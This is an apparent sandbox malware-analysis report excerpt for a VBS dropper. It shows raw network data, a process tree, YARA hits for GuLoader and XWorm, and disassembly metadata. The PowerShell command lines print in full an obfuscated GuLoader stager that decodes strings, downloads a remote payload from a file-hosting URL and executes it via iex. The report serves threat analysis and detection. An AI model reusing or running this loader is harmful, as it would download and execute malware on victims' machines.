                                                                        2024-05-23 16:25:56 UTC15960INData Raw: fc b1 f6 cf 04 0c 6c 69 9c 25 fd a1 7a cd 45 a4 6f 81 0a 6d 57 1c 0d a8 37 99 86 1a c2 51 63 cd 40 b4 50 a6 6b a4 c7 bb 48 7c 71 e5 e7 6b 80 ce c7 6e be 2e 86 87 0c e8 55 53 33 06 45 71 90 e3 94 c9 dd 7f 9a 4b 32 99 96 e1 17 1f 2d 5b e2 c6 ef 8d e4 2f 74 41 08 96 25 bc ed 85 a4 c8 06 d3 dd fc 7d 4a 97 de 02 5b 9b 9d 6c 91 ea c0 79 20 29 45 82 98 bb 42 5b 5f b2 83 6b 76 84 f9 bd 0c b8 29 20 33 5a 20 17 38 03 8c f4 90 dc c5 55 72 0c f0 58 1a 64 62 19 5a 40 4d 8d 2b 0e 56 64 40 60 7c 60 7d 55 b8 b5 40 6c 31 57 e4 cb 64 35 26 e7 ab 61 9c dd 92 78 b7 23 83 38 e2 5e 11 63 0a f1 15 a2 f7 f3 69 b3 4c 76 11 bc d1 7c 65 85 1e 6a b7 29 65 63 48 ae fb d7 e3 cc 5a 2f 02 13 84 e2 36 2e 67 43 96 29 6a 5e 48 08 55 09 86 dd 85 e7 fc d4 c6 dd d9 7c b2 30 41 f6 50 cf fc 35
                                                                        Data Ascii: li%zEomW7Qc@PkH|qkn.US3EqK2-[/tA%}J[ly )EB[_kv) 3Z 8UrXdbZ@M+Vd@`|`}U@l1Wd5&ax#8^ciLv|ej)ecHZ/6.gC)j^HU|0AP5
                                                                        2024-05-23 16:25:56 UTC16384INData Raw: ba 46 e5 0a 02 1b 24 42 3f e4 2f fd 22 ac 4c 22 52 cd 47 b6 6a fb a0 33 2e f5 06 e9 0c d9 90 4d 39 9a 1c 3b 39 91 87 17 1f d2 a4 e2 c5 57 cb e7 5a 7d 52 08 f1 65 30 d2 85 a4 c8 06 d5 c5 ca 7c 59 97 b9 02 9f a5 9d 6c 91 ea c6 71 c3 39 56 82 ff bb 42 5b 5e b2 b1 69 76 04 f8 bd 67 b4 36 9a 3c 5a ff 1c f5 22 35 f5 04 12 e4 01 1b 65 66 7b 6a 16 0c 7e c4 22 20 ad 49 6f e0 09 2f 14 5d 02 35 78 ca c0 2f 4c 75 34 c4 8f 2a 66 e3 89 c4 05 f8 f3 bf 71 bd 07 82 38 0e 5d 11 63 0b a1 bc a1 f7 bf 69 b0 1c b5 69 ce b5 7c 04 81 1e 6a b6 29 0b 87 48 ac f8 dc 90 c3 5a 2f 7f 13 15 e6 3e 2e 65 43 36 2d 6a b0 d0 08 fd 0d a6 dd 81 e7 f6 d0 c6 dd dc 3c 1e 34 61 f6 56 cf 4d 31 3c a8 e6 e9 12 eb 45 14 f8 51 8c 92 23 41 73 96 af 7f b7 c7 3d 5d 77 83 83 0d 3a a0 59 3a a2 de 2a 85 a4
                                                                        Data Ascii: F$B?/"L"RGj3.M9;9WZ}Re0|Ylq9VB[^ivg6<Z"5ef{j~" Io/]5x/Lu4*fq8]cii|j)HZ/>.eC6-j<4aVM1<EQ#As=]w:Y:*
                                                                        2024-05-23 16:25:56 UTC2024INData Raw: 23 df 48 86 68 68 ad 24 87 8d 02 80 2e 3f 68 07 64 88 ed 75 d4 fb 21 63 de 6b 11 90 bf 1c e4 8c 64 5e 52 e0 9a c7 d6 96 68 a3 ae 4d 93 10 18 22 c0 03 d0 e8 6e dc f9 d1 3d aa c1 e7 86 98 fd 13 9b 33 85 a5 6c b7 e1 ae 30 28 f2 2b 39 b9 74 03 d5 d4 48 c8 24 ac 63 88 86 db ca e1 22 88 56 b8 1e 01 78 3a 4e 35 e5 8f 64 9a a2 3e 4c f5 db fe f6 bc 02 1c a6 af c8 22 ce ee 70 fb fb f0 e7 85 8a b4 76 9c 9e 5e 32 e6 4e bd 0c 1f 03 8c 42 5e a9 47 10 14 27 c6 fe 39 78 ab 66 92 bd 86 c0 27 22 ae a4 98 33 b5 44 52 ef 9b 81 d7 c1 98 07 ad 0d 56 62 5f 4b 09 50 6e 9d d3 7f a3 81 e4 1b f5 db ad 8b b8 96 c5 aa f7 37 b6 b0 a4 3a 22 b3 18 30 b3 ab 5c 7f 6f 20 2a 65 b2 c0 c2 aa 27 4e df f4 d3 ad 3c 7b 55 80 79 ab 71 5e d8 7e 6d ee 66 54 23 3e 6f 18 71 65 81 52 d1 81 c6 9d c2 12
                                                                        Data Ascii: #Hhh$.?hdu!ckd^RhM"n=3l0(+9tH$c"Vx:N5d>L"pv^2NB^G'9xf'"3DRVb_KPn7:"0\o *e'N<{Uyq^~mfT#>oqeR


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:2
                                                                        Start time:12:25:00
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
                                                                        Imagebase:0x7ff63b890000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:12:25:07
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron= Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$ IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges (Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals) {Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud= oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i ,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') ;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges (Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr ');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e. rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi ');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;"
                                                                        Imagebase:0x7ff760310000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:12:25:07
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff70f010000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:12:25:09
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
                                                                        Imagebase:0x7ff7da7d0000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:12:25:17
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron= Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$ IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges (Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals) {Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud= oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i ,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') ;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges (Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr ');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e. rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi ');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;"
                                                                        Imagebase:0xf70000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1850007327.0000000008450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1843333872.0000000005723000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.1850717650.0000000008D34000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:12:25:19
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
                                                                        Imagebase:0xc50000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:12:25:44
                                                                        Start date:23/05/2024
                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                        Imagebase:0x2c0000
                                                                        File size:516'608 bytes
                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 00007FF886ECC856 Relevance: .5, Instructions: 475COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2021496288.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ff886ec0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e4aca9de1c1d647f55013429edd79f778e0e6c7c35d2c3c2efd8b0a4cecc7555
                                                                          • Instruction ID: 980c7fc9816cad709a68fb9db76ee5992f7fae01aedad463a8924f0443a30dcc
